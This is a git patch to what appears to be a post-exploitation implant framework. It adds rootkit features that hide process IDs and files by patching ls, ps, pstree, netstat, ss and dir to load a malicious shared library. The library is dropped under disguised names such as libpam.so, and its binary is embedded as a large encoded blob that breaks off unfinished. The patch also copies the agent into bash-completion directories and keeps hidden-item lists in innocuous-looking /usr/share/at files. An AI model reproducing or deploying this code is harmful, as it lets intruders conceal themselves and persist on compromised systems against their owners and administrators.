From c54c5f53522c5c93270c5189d6f54d30ee9a050c Mon Sep 17 00:00:00 2001 From: jm33-m0 Date: Wed, 2 Aug 2023 12:52:28 +0900 Subject: [PATCH] feature: hide PIDs and files using loader.so --- core/lib/agent/injector.go | 19 ++-- core/lib/agent/persistence.go | 51 ++++++++- core/lib/file/loader_so.go | 2 +- loader/elf/Makefile | 4 +- loader/elf/loader.c | 193 +++++++++++++++++++++++++++++----- loader/elf/runner.c | 5 +- 6 files changed, 232 insertions(+), 42 deletions(-) diff --git a/core/lib/agent/injector.go b/core/lib/agent/injector.go index bb0234001..1599ad89d 100644 --- a/core/lib/agent/injector.go +++ b/core/lib/agent/injector.go @@ -89,7 +89,7 @@ func prepare_loader_so(pid int) (so_path string, err error) { so_path = fmt.Sprintf("/%s/libtinfo.so.2.1.%d", RuntimeConfig.UtilsPath, util.RandInt(0, 30)) if os.Geteuid() == 0 { - so_path = fmt.Sprintf("/usr/lib/x86_64-linux-gnu/libpam.so.1.%d.1", util.RandInt(0, 20)) + so_path = fmt.Sprintf("/lib64/libpam.so.1.%d.1", util.RandInt(0, 20)) } if !util.IsExist(so_path) { out, err := golpe.ExtractFileFromString(file.LoaderSO_Data) @@ -102,16 +102,19 @@ func prepare_loader_so(pid int) (so_path string, err error) { } } - // see loader/elf/loader.c - agent_path := fmt.Sprintf("%s/_%s", - util.ProcCwd(pid), - util.FileBaseName(util.ProcExePath(pid))) - if HasRoot() { - agent_path = fmt.Sprintf("/usr/share/bash-completion/completions/%s", + if pid > 0 { + // see loader/elf/loader.c + agent_path := fmt.Sprintf("%s/_%s", + util.ProcCwd(pid), util.FileBaseName(util.ProcExePath(pid))) + if HasRoot() { + agent_path = fmt.Sprintf("/usr/share/bash-completion/completions/%s", + util.FileBaseName(util.ProcExePath(pid))) + } + err = CopySelfTo(agent_path) } - return so_path, CopySelfTo(agent_path) + return } // prepare for guardian_shellcode injection, targeting pid diff --git a/core/lib/agent/persistence.go b/core/lib/agent/persistence.go index 6d4e9123a..dc8c88e78 100644 --- a/core/lib/agent/persistence.go +++ b/core/lib/agent/persistence.go @@ -25,10 +25,26 @@ var ( "patcher": patcher, } + // Hidden_PIDs list of hidden files/pids + // see loader.c + Hidden_PIDs = "/usr/share/at/batch-job.at" + Hidden_Files = "/usr/share/at/daily-job.at" + + // Patched_List list of patched sys utils + Patched_List = []string{ + "/usr/bin/ls", + "/usr/bin/dir", + "/usr/bin/ps", + "/usr/bin/pstree", + "/usr/bin/netstat", + "/usr/bin/ss", + } + // EmpLocations all possible locations EmpLocations = []string{ // root "/env", + "/usr/bin/x", // see loader.c "/usr/bin/.env", "/usr/local/bin/env", "/bin/.env", @@ -182,15 +198,44 @@ func AddCronJob(job string) error { return cmd.Start() } -// FIXME this is not working // patch ELF file so it automatically loads and runs loader.so func patcher() (err error) { if !HasRoot() { return errors.New("Root required") } - so_path, err := prepare_loader_so(1) + so_path, err := prepare_loader_so(0) if err != nil { return } - return AddNeededLib(util.ProcExePath(1), so_path) + + // create hidden list + if !util.IsFileExist(Hidden_PIDs) { + // pid+1 is for elvsh process + pids := fmt.Sprintf("%d\n%d", os.Getpid(), os.Getpid()+1) + + // mkdir + os.MkdirAll("/usr/share/at", 0755) + + // PIDs + err = ioutil.WriteFile(Hidden_PIDs, []byte(pids), 0644) + if err != nil { + log.Printf("Cannot create %s: %v", Hidden_PIDs, err) + } + + // files + files := fmt.Sprintf("%s", util.FileBaseName(RuntimeConfig.AgentRoot)) + err = ioutil.WriteFile(Hidden_Files, []byte(files), 0644) + if err != nil { + log.Printf("Cannot create %s: %v", Hidden_Files, err) + } + } + + // patch system utilities + for _, file := range Patched_List { + e := AddNeededLib(file, so_path) + if e != nil { + err = fmt.Errorf("%v; %v", err, e) + } + } + return } diff --git a/core/lib/file/loader_so.go b/core/lib/file/loader_so.go index 508a3a9eb..e0a60da38 100644 --- a/core/lib/file/loader_so.go +++ b/core/lib/file/loader_so.go @@ -3,4 +3,4 @@ package file -const LoaderSO_Data = `QlpoNjFBWSZTWasa6I4ADg9___________9_____3v________fW-fzz9___9db_____4A7Ld777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777774SmogBCZGTQp-RNpo1Gk8mlVVP__aqqp__7U3pRVVP__VVU__3pKqp__5VVT__0yVVT__epiqqj__VVT__2lVVH_-qqj__MnqFVUf_56qqp__tVVQf_-qqp__lVUA__yqqf_6qqf_6qqf_40qqj__D1VVD__yqqg__0qqP_9Kqj_8VVH_6qp_-1VU__ZKqn_5VU__aqqf_qqh_-qqf_lVT__VVT_9VUH_6qo__1VU__0qqf_qqn_-qqgf_6VVP_9VVH_6qo__FVT_9VUf_vVVUEiSEExMJU_DSYVVVT___U2mTIPVVVU___1VVU__9kMqqqP__eqqqj__9NqVVU___01VVU___Kqqn__vSVVUf__6qqqP__9Sqqn__6qqp__-1VVU__9VVQ___J6lVVP__Cqqj__1VVH__tVVU__82p6IqqoP__yqqp__5VVT__1VVP__VVU___VVVP__VVUf_-VVU___VVVD__1VVP__VVUH__qqp__qqo__wKqp__mlVUH_-qqn_-qqn__6qqof_6qqf_71VVR__qqp__qqp__qqp__qqp__6qqg__2lVU__2qqoD__Kqp__6VVR__6qqgf_7SqqBKahCaA0pp6aaMJlKfqbaTalVVT___1MhqVVU___0VVVP__eoVVU___aqqqP__Kqqf_-8iqqp__41VVR___qNqqqof__6hVVT___FNqaqqp__-1VVU__8qqo__9plVVR__-qqqA___Qqqp__5VVT__1VVP__8pVVQ___RVVQ___TSqqj__yqqn__lVVP__0qqo__9pVVTH_-VVR__qqof_6qqAP_9VVP_9VVP_9VVP_9pVVH_-1VVP_9VVAH_-qqn_-Kqp__qqp__6qqn_-qqh__qqoH_-VVQSJEQ000I0Aaqqqf_-3qptT8o9UyKqp__lVU__3p6qqqf_-qqof_6qqf_71VVT__yFVUf_-qqp__tVVR__qqo__zVVU__xqqqf_5VVP__1VVQf_6qqf_4FVU___VVVP_9VVP_9kqqj__VVQf_6qqP_9VVP_9VVH__qqqf_5qqqB__6VVT__VVT__1VVP__1VVQ__1VUA__9qqqn_-qqj__aqqg__yqqAA__1VU__1VUf_6qqP_9VVP_8qqg__1VUAAf_6qqMH_5qqp_-qqAf_hKaJBJp6qfoyNNDRpPU1NPUGqqp__sqqp__-p4ptT0lVU__zVVU__9NFVU__2qqo__wKqp__-SKqp__tPRGSqqD__FVU__wqqn__oqqn_-qqn_-VVT__9T1VVQ__9VVQ__9KqoP_9VVH__qqqf_-qqoH_-BVUP__VVUf_6qqf_tVVD_9VU__KqgH_7VVR_-9RVUP_yqoP_1VT_9VUH_7VVR__qqo__abU1VU__VVP_zVVQ__VVD_9VU__VVP_1VQShEyIAjRiZNVP9TRVVU___9TKqqp__71GTT9FKqqf_-qqo___Q9R6iqqj__2VVVP__002jVVVT__9NVVU___1PKqqp__5VVT__9PUqqoP__Kqqf_-qqp__7VVUf__qaqqj__NVVT__PUVVT__aqqn_-qqn_-VVT__2qqqP__amQ0VVT__VVR__6qqj__aVVT__xVVR__qqp__-pVVP_9kVVQf_5VVA__3qqqgP__VVU__1VU__yqqf_-gKqp__vUqqgA__9VVT__Kqo__xqqqN5Fcjw-V8f40s36g7vYY7I389_uPG72HFuN9qcP-4HSdz_CMPwZDH4A9Zqbq1fY_P3GZOesvoHRlvp2eFjTcKtj-cJLZTHUm1ye8Us7O4klMcUYojXjiaKKLoP8OeZj44yc_lPdCnTpSc7nEkmjEU3RlLnO7JUTm3hRN8E548MpN0K-5S9LZwznSHm4CwsDgzeb7mDaKLlai7oeDFDcKXHldxrZiBTqVTQ1-J4v4enXCS1IYdHSf7EatRYjSlev4uJV27E4llZXDMWVorNSot4z99NWhNNSlnsWbPi6nE8bk-BXyrvFyt7xt1kY-Pl5fI4_J5GNSRc5Xh3L2Qby-52W6UToi6BmNAuHoUbUt--sxILvggGwTYgaDmtB-CKMuDe9mj9nX62Zn_dUZqGdXpCrp0QwDGHDXiiW5HeTAyJTfa-asoRd71Nzp0SJfjBnnPFzpIQUeNRIoghD480hghvkrP9EmYB_v7Hofh4__fl_HW4fI6H9979fL6err-Lt_vvvX2ef9X-9bY5nV2t3jHidTud3rY8CKoy5rMC3-FwHhBTv1JxHx1aiyGZov3jxpZ4poNhw7SRIhIDvqKFwxAI9TypXsiarndn6OjHCjrv_1znYdF9zO5aPxVvh2_MpliXldZkjeMdrDlWYFLs-nFXZ8uhaiPER-iNSLYkhLJ6Mvpblq3Ov3NnF2ru3fnHnV9v07Vzo5O1zL3JzqXqbDg7VGGQISC40hBJgg7bEgJMENmymhqE3hIkgYgVGUDveHHzXeqUPM5lppNCdIGlVEnKJVVHKqhQERN-I7kvROUcp7kKColgmZEeoJAJHSTFAgChAwxQihBZTHnL0E2ymnncCEjnNJJDZZskCJMBsGwENg6goGHaLmYHJISZg73fczMNURdQHVQxGhoIGxPehL6PCxKF8u38nZ8Prz-LlpubVHLd-ei--SDx9WD2t-Ovv5SAChBgYjlLao7DoGp0XdNAgGSAKOPZI3T3ab7yhg97I5K-FGywtf5rOJhe1Pijp4IDK3VnSyTyWX_y_O-GN3kcuy6ljZnQ1SbXpxg1oSEzMIQ1lYymBAFCx2iTSSbSGxC1wYhT_5lyjP-_5jk9yJb_Op8T6-LIl5HA5ZLEEsrkmSTKXNDf89cfWsdP8vx7s13W8rRdNVWGZ2mi8Zwha-Q5x6KS0FHb92L95f5I-9C42AIusP7-A20CaoegtIOgmsQqMwzOd8GLSzdFDMNf7OLrSZhs9bYwhMpQEwRUTpGLL5xCQQFUQN53drLdVY4sEcomGKtjqexXhZmG10UlWQmZjbTA36wQMMqzOBnIagMCOIOHIyOjErzG7MdWSCvXELNPJDBSkXbM9Kk8mwQnOKOWQ--HacASfvGRxtMjdTS1B7NEehE-YBbOfk4qd0uNjSAe9fjmoGNpC2BpYDaxcaZeq3Thi60pJh3JQpUE1d2sd_XhlTl92Xa06Wx8UyZBEqYph1P2mE5y4tVpM7wvt8t_Tgh3nG-zek-Q89SXydeT1qH6bO_-D3Z6CXqbJ0UCVPQObkdD5P01sHU4fDmKCjbGHj2er4xp8_nQEPhN13gZTA_mzoSLOjblra2sSR5HIJgjY57el3aSF4of77Xyy7Txfw9Xp63f3-T2_6-Oh5lXV-mA9mA6_D8X6odz39U1Q5o4eMZXeY1fXMnitttttttttttttt2vPy9LNw5MmXW1taRfqYHp-T1JTfxzI3HPNPvrGk4xwP2ppk09mUudWKr_2FVFEzwCU7ygjDDeZxP0m6ibTibQKJsUJJM-zSe_wD13vEHrY5_Xc_0G47qTmuXs-SQqQY2Ot9_q-fb-KnfbjrTyS17UBk_l6WHlNm5o-vYs9XnQH2NDdsQPzpPRt3YlmbkprajMEnubcApNttodNR8kSy8YuxilUnu_awzcr67PZrygNX3ujZhFuLZzLd-vNvnZjLhmT6_wobaST0xlQe9GTpFNX59_-vVu0cHJFz1pnQ-k6I1sQHFBU35Gvor384_qOnlDuji5GfVLp53E-3NLO61NMl7udw9LIart_lw5aRd38HqA4ex3LW99WyqfT9E5G5oxwahXs1Pkgufp6vxMLa7f-f3r9r66H7VebknDmmmm-nk6-lz_52uX-_7dvxO37m19N7p8a_p9bP9P2c-1cL_CdsfLwCPWZoT5wc38CATGYVNzl8xeNHK9KvWEavQgPH6ff-zw7hRqdcMPTr4YjU_a0YNUejP232uoVi3USSQhMkwJDJDJJAhDCQkIaH_LISE1qRDSFDFAxjTahoUDGnH6-nEERA0mQyk0iAcHcbXIZoZtgkAwiZxVWlgWthgwD8ffJLXw7DkZR3O2fj0XsyxkiSZ3UaYuqRRHphIQ6UkckDEBAJmQkXuwTnVJSrXrYKcSQpImvZ8uXPk070vQ_tnPSR8cF3dmwTdnOoY1YneKSx95QienI4VUxjHf8qaXOnziDNBkKqnJlbp2n1ulTDFljMTpa5kyOxV4QacQtxJEuAhjYV5RCvn8FJcbaWzyOMkEf0OEWYjJlNEhNJVNXmdG2iX43vjadgbk41Cjoy2n8sQ20EFcMBFfTlPMcvvbLjkSBhzon1LPuQvde--JPH1L1aJ8QsRz5UzMS3jhP3wpCTbXgzU4sKRzAuA6ZR3slRQt6OphEbbL_1IL9jKi-lyT-GKColSrxiPXsmFacMNL888iR3ebL9qgQWW9MlqcIxS6UXDEn9mPoKahEbDnKDIxdy4b0zohnD2IqZQITFr2YQBMQs7EgiACygq7aexKRo8Y-fqkjf9xt63Px93Xq6970oNnhcmLeSN1uAZyicQFN1qi8NkZWFXi06RpJWOJ7OMb23uPB9vreRLo9jW2bdivrZ2PpbvR32jocXUzNW5j3tdmbdb_MN2w97whzoHgOec1DtnxCpGaZmbR2PX4vBM-f1T-CLFu9Z7PHPn49P0V-6qMG-xi3WhNkiyhw538FonwJrSdN41upiW7E-rzMBRoyzvkhpfsu5yDt_EaD8GwFY9i_Z9mE1rOsPB-oz9F-_dtbnEjVxq7M-ub6v3TXgfrZla7tIWUejfe0Y-VXn-ataxGxOvWtMwF1M73rx5GEW0CyWjOQn2_3rVJkxcWsFTIBeax0ON8tjoozXMyGCYsipgukO-iOplcjILDQy8xZpPE-GAfvRIhFBmWZWeWyIH0k10TaJdrSRTs0glnWIEcZoFHCoIovoupCvvZLmbYwMUcRgDFzKUyKxYrFO9Zczi7m382hCPGU92PRnb8C_80lYgGIKpu1XLLhZm_LQ6Me7XWpkoinXv07cyiTvqKscFNMlenREgJrheonKJ7rPoFm8rZbwmpMokKatiEsO_ilo4D6PtdrGIXFxsQeWSljs6NanlbkFyMSzQpaFxPNx7ZtsgtpVnWoOKxuKMGco1G2SoXJrrzn0iB2K_FJ6WS-TGqOH1H1WpTvN-56lyrbqsrmPGqKq3i38rcxOpqWJU20UlGAy3fwrlUphyitgUVpHAmdMz3UGTomsSZHwQsVAs-O2WUhxSvFCwX8FVnnDduyOHYhIOfeC1_hoWS1bMZNVbpzwow5sWronq-X7xhOr7iNxjG0hCsXPM16xVqlRm-W5uLLlQ_lF7BFPas8UxTwy5u9k1jc8bs4C3DyohOROwtS7QdMazREcMhB2WyusRpqW-6RDbnMYSaBMXBDDJCEJCBz3KS1WSpFSCoyEKZlU0xFM-Bq1kRkO9kzZF8haTVcaZdgUMSaYt9bQzkJryZqjxwNrxg4KiZmEhmB6ZjsCBjLDnEhtQ0l7aZfBiSPhYlv169E0mDOxCUMCQMZCDCR2g_K5sgablv4iACmnepYSSSY9V0dhMnuBFBMJQB6h3Cg0BXMN2fDcSPJZ93EHZKkfMhpQQPHM73_emxZyMjMHC0dqA-aiuqzMQCYYj9ZwMXCcgQt6MztOEZQNCC8NcHpoW0RM5hAzOs4M69rYOL5eNZhp8HLw8sz8nDNt3K5oVwkKNaPS5WOcASTMzGK6rU_bFjnqF6_RXgwHfK0ngqqWCqv0MRhwWWTRTcIO68WFBZd2qkdn3ujNRyKvztyavY40Y2OXLmCiy9NlZGNNik8DMv5ufcuIEJqaYCpgLT1Al6IwRChwr3Qzb5NlNluWEkwV70KYYdi9FjZTeumqqRzuv7bi1iErYueOxdoMAgEFx-A61EAfXE5LKXxU6Ye_hIQi-w3MDGhAxiE6CI2v1G22fvjfmhI82xarEYxRZ6YBxjOEkcFe5Z9uEun7qg_2LwVJJF2vV2hZShRrG6QrH2R8zUDsV8zcqvgU695YLvBnGO8TUzjk0AEVMDJxmdtF2cQ2g0oidmYW6iIqgMyID6srOQBSBRHJjJEZUpUz6HWUrjBJEntwXTsw2CqaJhU01VhMMgEw0-GL3aOJC6bNLAzmpCBjAnEVWivMRWZcO_qke9pbHe7dzCwT_uhJz8v_02RP3cf6LjB2N7jfyQjuNke94Kd08jwkyQJkSOhwkDNjbJ7ZzaCTaCpqGG_4uhIPOlAURVIZsQpqTjv1HCpMxgJhkhm3vM9vz80_Tc9_lYvN8nT-mx4CzxGG2in1Pu9XUv6X9f70m6ubdyVMwtqNx27RhYf4T99zNX1NP8_1sX91VPSVEzF4KjZ-jG9uCvHLodSQkPz_q1_dXQ1KGKhUcIR0u8_ydWDzOX8Gl8Pm_pyDu3f6-rzfb-j8ukvd2eTbmmg8-JdQ3dWNDHVy3HGbyWnMsSedExz3ZOBx5PGn-DSfxOt-uxTAatWVFm1PWqj2Zhkj_LBHV6vUq_75n-97l7nv9TizZ9GPHjx49nr7KSXWTBEhrhYAl4mez9sIGbzhZqGPZQkMN8NX-QDD7yxKQwE66Sag7GDmSmlbg_kr5ZpAgp_Cu_4YZZO26I9EYGX75oM4kGVkXQrVn7kVXtf9_sVOigl6dSby4q-E-GnPuYSaSSKEbtd2nZVtQtglbEhrRiT0Fu1IrWrBWr30qWDwNOsAdppdItCWIDPuDQ2BicMxES58_P9rWlc-NzccpkklAgRyRyTz_qMtA0yIwU6XFw3J2WacWnTp06dPlWeol_wu5IpwoSFWNdEcA=` +const LoaderSO_Data = `QlpoNjFBWSZTWU7ZEFIAEbV____________________________X__9_9____9______4BLrd777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777774SmoSYmgak2g0Mmk9VPR5EwaTVVVP__yafqqqqP__VVUf__qqqn__tVVU__9gjSqqn__6qqn_-VVR__5MmJgalVUf_6qqf_-FVVAf_6qqf_6qqf_7KqqH_-qqg__9VVR__qqp__qqp__6qqn__k01VVP_9pVVP_80VVT__VVQ__wqqn_-009VVUP_9VVP_9VVP_8qqn_-aVVT__GjVVU__1VU__1VU__yqqf_41VVP_9VVD__VVT__1VVH_-01VVD__1VVH_-yVVT__0Gqqo__xVVP_8BiRAI0JpiVPwTYj1EyaJgh6TRkVVU__9oqqp__-NSqqn__4nkmqqqf__qqqn__-kKqqP__0yqqo___TRpkaaqqo___Qaaqqp__41VVT__9KqqP__VVUP__9RVVR__5VVT__9VVU__8qqp__6qqn__qqqH__qqqf__pVVP_9qqqf_7Sqqf_-qqof_5VVD__1VVP_9VVAP__VVUf_7VVUf_-mqqoH_-1VVP_8qqj__0VVQH_-qqh__6VVR__6VVQ__9VVT__CqqP_9VVP__FVVASJTRAjI09ETTT0mCabKZDSqqp__-Kqqn__5TwSqqj__1VVP__NVVU___VVVP__xVVU___VVVP__NVVU___JoGVVVH__tDVVVP__NFVVP__KqqP__1VVQ__9VVQ__8qqp__-qqqf_-KqqP__1VVR__-qqqH__qqqf__pkVVUf_-ZKqqH__qqqf__qqqh___qaqqp__6qqj__9VVUf_-VVUAf_-qqoD__yqqn__5VVUD__yqqh__-qqqf__pVVB__qqp__qqo__1VU__xqqqf_6qqP_9VVAf_5VVAA__1VUGJCZIEyaaNT0yJkU9k9FM9U2lVVT___U2iqqp__-yqqqf__qqqn__6ZKqqf__hFVVP__aMSqqn__qqqP__9VVVP__VVU__8FVVD__2qqqf_-1VVT__yqqn__4hVVT__9VVU__9qqqn__6aepVVR___kqqqP__VVUP__0aVVUf__iKqqf_-qqof_-qqp__56lVVH__lVVH__6qqp__-qqqH__qqqP__yqqo3_-09VVU__xlVVH_-0VVT__VVR__qqp__qqo__1VUAf_6qqP_9VVP_9VVP_9VVP_8qqn_-qqn_-qqg__yqqAAEiiCNA0mSn5I01VVU___CntEbTIqqqf__o0ZGlVVP__xNVVU___J6aRmlVVT__9VVUf_-YlVVP__aqqp__5qqqn__5VVUf__mplVVT__xoNVVUH__6VVU3__qqqf_5VVH_-qqn__oqqn_-VVT__Kqp__mI0Kqp__6qqj__Kqof_4VVR__qqp__lVU__9VVQ__9VVT__VVT__VVT__FVU__w1VVP_9kKqp__6VVQ__2lVU__1VUP_9VVB__6qqh__qqoP_8VVR__qqp__qqp__qqp__lVU__1VU__1VUBKaRCBNoamk2jTRCntGKVVU___yVVVP__eo_RRqqqn__sVVVH__6epkxDVVVP__VVU__9VVT__zVVVD__9VVUP__01VVT__9qqqp__7VVVP__0GNJVVT__yqqn__gZVVUf__kVVUf_-qqo__8qqp__-mlVVP__1VVT__8qqqH__qqqf_-VVUf_-qqp__-Kqqj__1VVH__lVVP__Kqo__1VU__zVVU__1VU__1VUf_-Qqqgf_6qqP_9VVP_8qqg__zVVUH_-qqgf_-qqo__2qqoP__VVUH_-qqn_-qqj__FVU__xVVP_9VVN79kdyTA73v-HxfN-ifrZ_SaX3g6nwje_8w37df8Xjfna_3-CVxzqLypQgB0v7xiIHqISJgl3QGHtJioLc35euhjd4cnzxcdiwZOPLCaNXT4nrJC9cQ2MHXYpeeWJMwqu79Dmm43ltWKJFqrMbOXAmHBUYxpz8PLojQlKT_E8Y15b-UpN4WDGuKKcFCMXYVUMJp-2d-rVqyZyGFnK9upUm7mMYzWizOTTTXkRjG9PJJJmsSSSSdRng8ZMSnGOzKhQrffffy-pkUE1LDw7l2EoXY1X1cK9kJTu-9dslW9NFhwvFUYfCvB6pTKA7VU9WjUSO8Ku99GkmxcGahDTojfrNvSeLkENVoFr8PuyXr8GDbRbenuI9TZ3k-dNg59fbXNzg28XysvOz8jc6GVjanV8vb8rf6eDf4PM1dXc8zxvNzqGaZN4b26zzDxGRtHWHESmWQCWowDdLPj5D--XSRABigNwiCBoMR-aBoz3vb6up-Gt3NPS3XHq1Givf7C5aIjypgQhafTS37sCdzeC8dpIFGR8XjWSUOhJLtYkCHUfKjG1pRiwDSaEu_3EhAQy1HGYcOlSfmQGYHYX5eJqul1f06fU8HU7rzq-tu8Ljc_O_36d_f3PW2nuw-rgffj-VqOdj05e6VRFy1bMAtY4ZWzgAhexGYolDxeK6TwEGGcoqZYVHABxwNtzZpILWHRZiaXFx5zoSJNVWI03WohBJtrvjK7q0XBzm_nuYcD0VXrcXXUKPN4P61R3jcrevUacLzLPI1EJhcQVfXO4lmAUODCHq8fzo2XKlmPbvKesypPDml7-pPv99Rjb_h67_2hr-FptFw-HjZ_k5mn5WfWNHfY8Di5mvyvMy-Nu8y_nVdTgUpYoQ2pM4wMzN6KZgIISEJhJkhkCSEJCiTM5CSSESBgsxYJBJAGJAm2iAA9QIvCF4sXEitAPgWSZl7CnJ9KIduVQmJoIVDJzZEq1SeuXs2CzIE8W1J5MU5zEvCDnMC5di_rlyJB4pJe4jyxpNMgK6AYhGCVVsyYwi2NpwhFlhpcZhgDvsnTFO0CTJMMwO6d0MyevArobXINNMdBE0zswwzcJAzDJE84hwD0Akwkwwy4rgdcYZzGmg7xWJIZLisWQBPvdbYuAINhRoAjIKB1CzUFWaKG2NibAbFw-6xKEVWg86WHl9Lnd2iWtrVKi5kOjLrwpJDb-9hzCHXmBsX7a11uy_Mxw8gFyJ-PkYNa1A0Umb4zsUotIK7bUDUuA2IBoYhVb-L7sPAltPCRsdVqrkS1LjS05HeoYN5VIO1OYAbKqQ1hF_Zq6ulWKrzVMvVzUqiq1fYpzVKFOs7dbXCdaha2Ra5N9fJi0IQmw0Mw4Q2tYkYSIkAQIFtToAuREKCRCCDIEJFJA2ANpIOEDBH-7OI2tvOOd14c324NpW3m8grYnb0SUAZSZIJIJURQyz8Ftejmo2uh4ON2reL0-lk6Onw-32Ops_i4-q3aw9xytpuuF0-lqcntO8-SrCi51tl1zZaKOffZHlnihEy5iGRjHEN2ksEk-D03pVG_cgfEw3YQDMeoYwCaNtDdFGLPGDzXy_frfJ5H2-fg5V5M59mbCqs0_cOZmA5OC7MoANUjQjAhvbTDNQSIJhCIDK-CAbQF2D2A-AEFIETonK2e8EO6om9j1aopNLMG7vu_LyZw-9ghe9iKBukBPFhAvC94BSNcogmoNG-CQvP8UJk4ZXMZ25CCVf3dUOAFNIhagiywG7SkMS3KTTvV4tJFwgWPIzek4-Dqv9yCr4nd9D62ivEkcdMkJNF3QqCDkDs0i1Sa6vXgztR9X2-l1s3Q_m2TA0xHM8tgYxMD21OakI0hAyQALP1tzvodqwAQSBAEomLBBE0IqoMrfmlTyzv2dGyTFJJJuIJTSIKJ2DswLxfp1_hycOhFUuTbPkGhRQPtejO0wOi1aZlfdDBcQdP5sXeBJWYS17E7-4PWUzxpqPC3rgTUiystJubIMLg3uP0PUzPm53T2_2arbF54PcO2XC5qRBCLbUX2owaXJ5vOJCW4z0Ib2EMHYofNE1na0QN_t9MgaWWRB_D3aWn6cYGSGryeRzcOL5eH5O26HpfhyJOX-7tzPrPFgPGYNfx_ix8j4KB7mL-jubtclZB2oGaHCAEB_mAbpR_CMbg0UUUUUUUUUUUUUVh4-xhX_UxqmNtaaaaaZ6aaaaaaMW2wDReVx82Yn2hmhxPL69QqFTQ73EtuBGfNMnb5IIKimA998FvujSHEwITTM-6IEOmAU3BjPkBj5BP56_FTR5jovlgLEkml7rOYNM02wLxzP0-OdzoCfs3YEKTPpwsQfQsQLKinqoXN5m3hHg4_hZbeAtoawu8GJrOAuJelxunkD699geq_UtC5e_rFCye5g2Il_6hyJSnrrUlDsV2fcYbWpzsdi5JJJJJJJJJJJIjjtqo6hg_bTuhgi5Tuyn_Bj_J48-FuYdjXaGkbIjRLpVO5s_7YTbe3qaH1fz-f7d_9e9ttbUtoFfOXWFX7dK5gfdmNGMKGdS_Htxjs5RD7UMjhN6cNlUn0h4Ao84RqofQgeI2yLRq5IxRrseFh17eTiusq3vdTnR8zeFYJtbQQVTeSEqnz9loegQeCOMsEmSS3Rdu90T5pfFsG81Cp7zSt534Kg7c3XEgQ4_QydjT7Tl6EwM3UPDNeSSQxrLYR2daL0JKBb1BUxrZa24IKlEumN9mXOh7I5NWvJacLwX2thq-do7uXbv-3YW2CtdP_uf_v9dr8OJ7vZ5v8dj4_6ucTn3uz8V7Tppppppppppppp7Hi3PzeV3Pwwdrjbvgd7V9n299sNBczhZvA7E_T-nnkuH2AMf8HKYAMRdE4fl8UcY57bj5Ru7A3g3lUECigR9D-ehcJeXU5QXtnE1lhIIbTkeUUV-fDcw6psxmfNl49apCGLyPmKZiFV9dhYTukhCBIYSbITJ3GSSBCYZISEgXMc5kwzILDhhkhnMmSZJwmGciEAgEUS33eq5wc5xD0QiECnl4cAwLMQ4aG-oOGpJSS_gmAQyUD1-E8z3IXUuwUkHR13HEm6es4sg7U-rV817MowiIf13WnGShElyISCDTiTJgiQkGky_z-LJIcKJcnwLR0TCjecCpG0khyVIs1fnQ3s2TMGyIWer8jnCZmPPcuxjQPE-j-AvViVXS5VpGPNjPGjhKN86B9aZnMkIMwWDDf7KaXf0pCAyg5CV6mC3oZgjiV8R0BV9xqgE9yzPTlNjgj5eALVoLFN6a1gBFKIWYkibcEMbC1LOELYWcsf4k5WQrrNixf5PH14zFzmUGg59Ji4WU-BYz1ZooOfDEnYvZpg4OiXPEkvJhnYQP4xfaVVAuHiTMqUFDI3IOtVI82b0RBoK6JSCCmdWz7_vLAnJJnoSqAOuTE48JHp9GJ6soXZ1MdZWMmXPZemfWpSPiIord_Q6UIzgrRxUkzMUrMdh2gizgsfmKd95E5gkH56WpBUanlgx0y66hAMM5_RSfdGoSqnUDSNSlcHe-hX8ti6xllSw5Ez4tyzRYDueKpIklYpjOfRxTL0YEKt9lBXBMh-jrzivhTkknoLKFkbMUGBFSev_rJK5oKfNrU4iUM049EdZxGfhWNDKUBpgzIUMwxCYsa_cugCYhtihIIQAKEE-bLZaMS42zjwz5fabffPuymbS9vL_18LxcqtQlrG47fW8DBtGVsebsG2aZtoV0Obe8QSpJnOHLK3FU07IzEt3I2LOtC4wx_GxNLtPj3e7k0vxWbXD32-1V3YZeu1mZ_7AwL-3keDhbLL4BJxxpIzs-YFPm-RBtPSJuzq9I_8YcWjBgv379-_pW7-DKwPAQZWNT1NxtBPDku872hnD9psfNxM8fXn5UfVEVokCdEJDrZeUkgSimhjA-00qrVtbjm1xzA2OPprlzIxLFiS7rCzJgUz0Wz2L2I8ajYdpdrpXenlkH5nTM37owxb1oK4qEk2OQ5V5sa0eCKSx-KG-GxeXqUHPL1p2lgcaC3B22ITEKAevlVDNUpCwhYhSLbozGRl-utYw1Uszc6ezBakskkCSiqJ-oxaxUhjIk5eBBPVrzTAX8-NDrwsKcctfWDND52czWx2ZWLNwencMlTzwlE29qKMItiYPFUw_6dyr0LsUHxYYr8oJCYIQjhbCg-ritdM5EL6UKhbgQGsktQDEdytOiJo7cEJDwLJpMYcpCqTKpYHs4rMNe5Zh6-4YxkLBNXczArxntIxSXDMYCRsiyk2Zr5zf30VHAcsSSjkR4lXD0WR5kxkNjVcyQYriwrFKMrUIyWSqY_LziGnhktXZKheHM0eFOIbbxA5TSuE8LQvMidDeMHvJh0g2VWqVKM9RkK59A8JF3EVUzsUnIoK5SS7fd5GOrhey3k9De_vGarAey6S--9M6OGXLLcMQYmBtgHPtfv_4bkZgCp43Wxsitx7_YCRtmRcR8ETUS4p13XmKq8poFNEV8qy41mBAJHUdRaSWCdNmwOPcnsyp43nwGvFcsdtAq49pyDWoY9ti3RWontuUmNHB9Su-o-eW2-FelSqx2TbDWkGTOPowam4gRs4lmdN3jCItfIWazG1GDMgM4M8TNTGXWGgKwgOTCSyDUiozl19fuJXsQXFrsNsQQWLSr8bZbvYbG3KnG1K89dZr-7UWxuMyNKbAGxxDlgTUubdv-7Ywr0hLG5Qmu-kBipIIpJBFEK3a9DyoWO-rnPcmdGS5ZnpNjcVOwCpetVdib0_XcfnhPDOBOFdL6WF2s5SEzSDInTMW4kUX4J4wszMYSzmY3pz3Emgt2gxRDDJCEJnohRoyzpOHlMc4BMhMlDDKTIAhPKNwCBMe_lbB-itf4aqAAeSjGEVfMWQAbSBjSznShNjRaaFZmIEufQEBYaSGySA5EAe4ESDaQSIJei4MwA88oUQEAkUgrNGEwUrQivniaKEwZgtBdaJpEoIGhmMRBTRXH4nMizNJxX79DAZVJVEkkx5btC27c4KDA6vv6EGGagg7JAOeJ7h3B7l5EMQJLzMWB_QQi9OCd73Bi3L5kuBMIhEL2xxuc8d9Zp3hImUAQAMaPCR8DQjPKhAhaA0iMxdJ1iSQjTGtNnvoXwE0pEgMYXdSree1K9stpteNaxH7-hO-hlDgcvdmpj7